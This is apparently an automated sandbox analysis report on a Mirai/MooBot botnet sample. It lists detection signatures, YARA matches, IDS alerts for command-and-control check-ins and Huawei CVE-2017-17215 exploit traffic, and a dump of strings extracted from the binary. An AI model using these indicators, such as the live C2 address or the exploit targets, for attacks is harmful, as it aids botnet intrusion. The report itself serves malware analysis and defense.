Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
zogsXPGVgB.elf

Overview

General Information

Sample name:zogsXPGVgB.elf
renamed because original name is a hash value
Original sample name:9e0ad1172ffb1d9a9024264a970d3573.elf
Analysis ID:1373943
MD5:9e0ad1172ffb1d9a9024264a970d3573
SHA1:2a16a3fd375ca3795a617773407a18aaa0f33841
SHA256:0e7d08b6fb10ab0cde7281fc25962710608a9fc1508c7e3593194d768e48331d
Tags:32elfmiraipowerpc
Infos:

Detection

Mirai
Score:96
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Detected Mirai
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic
Yara detected Mirai
Connects to many ports of the same IP (likely port scanning)
Uses known network protocols on non-standard ports
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Found strings indicative of a multi-platform dropper
HTTP GET or POST without a user agent
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample tries to kill a process (SIGKILL)
Uses the "uname" system call to query kernel version information (possible evasion)
Yara signature match

Classification

Analysis Advice

Some HTTP requests failed (404). It is likely that the sample will exhibit less behavior.
Static ELF header machine description suggests that the sample might not execute correctly on this machine.
Joe Sandbox version:38.0.0 Ammolite
Analysis ID:1373943
Start date and time:2024-01-12 18:23:09 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 14s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:zogsXPGVgB.elf
renamed because original name is a hash value
Original Sample Name:9e0ad1172ffb1d9a9024264a970d3573.elf
Detection:MAL
Classification:mal96.troj.linELF@0/1025@21/0
  • Report size exceeded maximum capacity and may have missing network information.
  • VT rate limit hit for: zogsXPGVgB.elf
Command:/tmp/zogsXPGVgB.elf
PID:5441
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
done.
Standard Error:
  • system is lnxubuntu20
  • sh (PID: 5454, Parent: 1588, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-print-notifications
  • gsd-print-notifications (PID: 5454, Parent: 1588, MD5: 71539698aa691718cee775d6b9450ae2) Arguments: /usr/libexec/gsd-print-notifications
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
zogsXPGVgB.elfJoeSecurity_Mirai_3Yara detected MiraiJoe Security
    zogsXPGVgB.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      zogsXPGVgB.elfLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
      • 0x1c0ec:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1c100:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1c114:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1c128:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1c13c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1c150:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1c164:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1c178:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1c18c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1c1a0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1c1b4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1c1c8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1c1dc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1c1f0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1c204:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1c218:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1c22c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1c240:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1c254:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1c268:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1c27c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      SourceRuleDescriptionAuthorStrings
      5441.1.00007ff4e4001000.00007ff4e4021000.r-x.sdmpJoeSecurity_Mirai_3Yara detected MiraiJoe Security
        5441.1.00007ff4e4001000.00007ff4e4021000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          5441.1.00007ff4e4001000.00007ff4e4021000.r-x.sdmpLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
          • 0x1c0ec:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1c100:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1c114:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1c128:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1c13c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1c150:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1c164:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1c178:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1c18c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1c1a0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1c1b4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1c1c8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1c1dc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1c1f0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1c204:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1c218:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1c22c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1c240:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1c254:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1c268:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1c27c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          Process Memory Space: zogsXPGVgB.elf PID: 5441JoeSecurity_Mirai_3Yara detected MiraiJoe Security
            Process Memory Space: zogsXPGVgB.elf PID: 5441Linux_Trojan_Gafgyt_28a2fe0cunknownunknown
            • 0xedf:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0xef3:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0xf07:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0xf1b:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0xf2f:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0xf43:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0xf57:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0xf6b:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0xf7f:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0xf93:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0xfa7:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0xfbb:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0xfcf:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0xfe3:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0xff7:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x100b:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x101f:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x1033:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x1047:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x105b:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x106f:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            Timestamp:192.168.2.13103.245.236.18855624199902030490 01/12/24-18:23:52.781823
            SID:2030490
            Source Port:55624
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.13103.245.236.18849042199902030490 01/12/24-18:25:08.174403
            SID:2030490
            Source Port:49042
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.1334.43.148.21440794372152835222 01/12/24-18:25:45.062677
            SID:2835222
            Source Port:40794
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.13103.245.236.18833518199902030490 01/12/24-18:25:48.641934
            SID:2030490
            Source Port:33518
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.135.217.251.10036166372152835222 01/12/24-18:24:33.737573
            SID:2835222
            Source Port:36166
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.13103.245.236.18837800199902030490 01/12/24-18:25:52.517873
            SID:2030490
            Source Port:37800
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.13103.245.236.18846632199902030490 01/12/24-18:24:38.749308
            SID:2030490
            Source Port:46632
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.135.212.54.2639800372152835222 01/12/24-18:25:06.574975
            SID:2835222
            Source Port:39800
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.13103.245.236.18857498199902030490 01/12/24-18:25:44.734065
            SID:2030490
            Source Port:57498
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.13103.245.236.18860280199902030490 01/12/24-18:24:52.304908
            SID:2030490
            Source Port:60280
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.135.217.251.10036166372152829579 01/12/24-18:24:33.737573
            SID:2829579
            Source Port:36166
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.13172.65.34.25450984372152829579 01/12/24-18:25:03.272919
            SID:2829579
            Source Port:50984
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.13103.245.236.18845976199902030490 01/12/24-18:25:32.909384
            SID:2030490
            Source Port:45976
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.13103.245.236.18839524199902030490 01/12/24-18:25:26.994483
            SID:2030490
            Source Port:39524
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.13103.245.236.18855722199902030490 01/12/24-18:23:56.646525
            SID:2030490
            Source Port:55722
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.13103.245.236.18856110199902030490 01/12/24-18:24:11.327108
            SID:2030490
            Source Port:56110
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.13103.245.236.18855014199902030490 01/12/24-18:24:46.595327
            SID:2030490
            Source Port:55014
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.13103.245.236.18857136199902030490 01/12/24-18:24:49.446218
            SID:2030490
            Source Port:57136
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.13103.245.236.18852350199902030490 01/12/24-18:25:38.831322
            SID:2030490
            Source Port:52350
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.13103.245.236.18856044199902030490 01/12/24-18:24:05.494458
            SID:2030490
            Source Port:56044
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.13172.65.34.25450984372152835222 01/12/24-18:25:03.272919
            SID:2835222
            Source Port:50984
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.13103.245.236.18858336199902030490 01/12/24-18:25:18.074238
            SID:2030490
            Source Port:58336
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.135.212.54.2639800372152829579 01/12/24-18:25:06.574975
            SID:2829579
            Source Port:39800
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.13103.245.236.18838448199902030490 01/12/24-18:24:30.862764
            SID:2030490
            Source Port:38448
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.1334.43.148.21440794372152829579 01/12/24-18:25:45.062677
            SID:2829579
            Source Port:40794
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.13103.245.236.18856172199902030490 01/12/24-18:24:16.155653
            SID:2030490
            Source Port:56172
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.13103.245.236.18858272199902030490 01/12/24-18:24:21.999480
            SID:2030490
            Source Port:58272
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: zogsXPGVgB.elfAvira: detected
            Source: zogsXPGVgB.elfString: Content-Length: /proc/proc/%d/cmdlinenetstatcurlechocatbin/busyboxbusybox wget/proc//proc/%s/exe/proc/self/exevar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemd/usr/libexec/openssh/sftp-serverusr/shellmnt/sys/bin/tmp/boot/proc/media/srv/var/run/sbin/lib/etc/dev/home/Davincitelnetsshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr/bashhttpdtelnetddropbearropbearencodersystemcundicundi.*var/Condibin/Condibin/babylonetop1hbttop1hbt./root/dvr_gui//root/dvr_app//anko-app/902i13BzSxLxBxeYHOHO-LUGO7HOHO-U79OLJuYfouyf87NiGGeR69xdSO190Ij1XLOLKIKEEEDDEekjheory98escansh4MDMAfdevalvexscanspcMELTEDNINJAREALZflexsonskidsscanx86MISAKI-U79OLfoAxi102kxeswodjwodjwojMmKiy7f87lfreecookiex86sysgpufrgegesysupdater0DnAzepdNiGGeRD0nks69frgreu0x766f6964NiGGeRd0nks1337gafturasgbsigboa120i3UI49OaF3geaevaiolmao123123aOfurain0n4H34DggTrexewwasads1293194hjXDOthLaLosnggtwget-log1337SoraLOADERSAIAKINAggtq1378bfp919GRB1Q2SAIAKUSOggtr14FaSEXSLAVE1337ggtt1902a3u912u3u4haetrghbr19ju3dSORAojkf120hehahejeje922U2JDJA901F91SlaVLav12helpmedaddthhhhh2wgg9qphbqSlav3Th3seD3viceshzSmYZjYMQ5GbfsoraSoRAxD123LOLiaGv5aA3SoRAxD420LOLinsomni640277SoraBeReppin1337ipcamCache66tlGg9QjUYfouyf876ke3TOKYO3lyEeaXul2dULCVxh93OfjHZ2zTY2gD6MZvKc7KU6rmMkiy6f87lA023UU4U24UIUTheWeekndmioribitchesA5p9TheWeekndsmnblkjpoiAbAdTokyosnebAkiruU8inTznetstatsAlexW9RCAKM20TnewnetwordAyo215WordnloadsBAdAsVWordmanenotyakuzaaBelchWordnetsobpBigN0gg0r420X0102I34fofhasfhiafhoiX19I239124UIUoismXSHJEHHEIIHWOolsVNwo12DeportedDeportedXkTer0GbA1onry0v03FortniteDownLOLZY0urM0mGaypussyfartlmaojkGrAcEnIgGeRaNnYvdGkqndCOqGeoRBe6BEGuiltyCrownZEuS69s4beBsEQhdHOHO-KSNDOZEuz69sat1234aj93hJ23scanHAalie293z0k2LscanJoshoARMHellInSideayyyGangShitscanJoshoARM5HighFryb1glscanJoshoARM6IWhPyucDbJboatnetzscanJoshoARM7IuYgujeIqnbtbatrtahzexsexscanJoshoM68KJJDUHEWBBBIBscanJoshoMIPSJSDGIEVIVAVIGcKbVkzGOPascanJoshoMPSLccADscanJoshoPPCKAZEN-OIU97chickenxingsscanJoshoSH4yakuskzm8KAZEN-PO78HcleanerscanJoshoSPCKAZEN-U79OLdbeefscanJoshoX86yakuz4c24KETASHI32ddrwelperscanarm5zPnr6HpQj2Kaishi-Iz90Ydeexecscanarm6zdrtfxcgyKatrina32doCP3fVjscanarm7zxcfhuioKsif91je39scanm68kKuasadvrhelperl33t_feetl33tl33tfeetscanmipsKuasaBinsMateeQnOhRk85rscanmpslLOLHHHOHOHBUIeXK20CL12ZnyamezyQBotBladeSPOOKYhikariwasherep4029x91xx32uhj4gbejhwizardzhra.outboatnetdbgcondiheroshimaskid.dbglzrdPownedSecurity69.aresfxlyazsxhyUNSTABLEunstable_is_the_story_of_the_universemoobotjnsd9sdoilayourmomgaeissdfjiougsiojOasisSEGRJIJHFVNHSNHEIHFOSapep999KOWAI-BAdAsVKOWAI-SADjHKipU7Ylairdropmalwareyour_verry_fucking_gayBig-Bro-Brightsefaexecshirololieagle.For-Gai-Mezy0x6axNLcloqkisvspookymythSwergjmioGKILLEJW(IU(JIWERGFJGJWJRGHetrhwewrtheIuFdKssCxzjSDFJIjioOnrYoXd666ewrtkjokethajbdf89wu823AAaasrdgsWsGA4@F6FGhostWuzHere666BOGOMIPSbeastmodedvrHelperbestmodesfc6aJfIuYDemon.xeno-is-godICY-P-0ODIJgSHUIHIfhwrgLhu87VhvQPzlunadakuexecbinT

            Networking

            barindex
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.13:55624 -> 103.245.236.188:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.13:55722 -> 103.245.236.188:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.13:56044 -> 103.245.236.188:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.13:56110 -> 103.245.236.188:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.13:56172 -> 103.245.236.188:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.13:58272 -> 103.245.236.188:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.13:38448 -> 103.245.236.188:19990
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:36166 -> 5.217.251.100:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:36166 -> 5.217.251.100:37215
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.13:46632 -> 103.245.236.188:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.13:55014 -> 103.245.236.188:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.13:57136 -> 103.245.236.188:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.13:60280 -> 103.245.236.188:19990
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:50984 -> 172.65.34.254:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:50984 -> 172.65.34.254:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:39800 -> 5.212.54.26:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:39800 -> 5.212.54.26:37215
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.13:49042 -> 103.245.236.188:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.13:58336 -> 103.245.236.188:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.13:39524 -> 103.245.236.188:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.13:45976 -> 103.245.236.188:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.13:52350 -> 103.245.236.188:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.13:57498 -> 103.245.236.188:19990
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:40794 -> 34.43.148.214:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:40794 -> 34.43.148.214:37215
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.13:33518 -> 103.245.236.188:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.13:37800 -> 103.245.236.188:19990
            Source: global trafficTCP traffic: 197.15.137.160 ports 1,2,3,5,7,37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 36166 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 36166 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 36166 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 36166 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 50984 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 39800 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 39800 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 39800 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 36166 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 39800 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 40794 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 39800 -> 37215
            Source: global trafficTCP traffic: 192.168.2.13:16879 -> 197.21.115.18:37215
            Source: global trafficTCP traffic: 192.168.2.13:16879 -> 197.70.50.228:37215
            Source: global trafficTCP traffic: 192.168.2.13:16879 -> 197.8.40.111:37215
            Source: global trafficTCP traffic: 192.168.2.13:16879 -> 157.148.191.146:37215
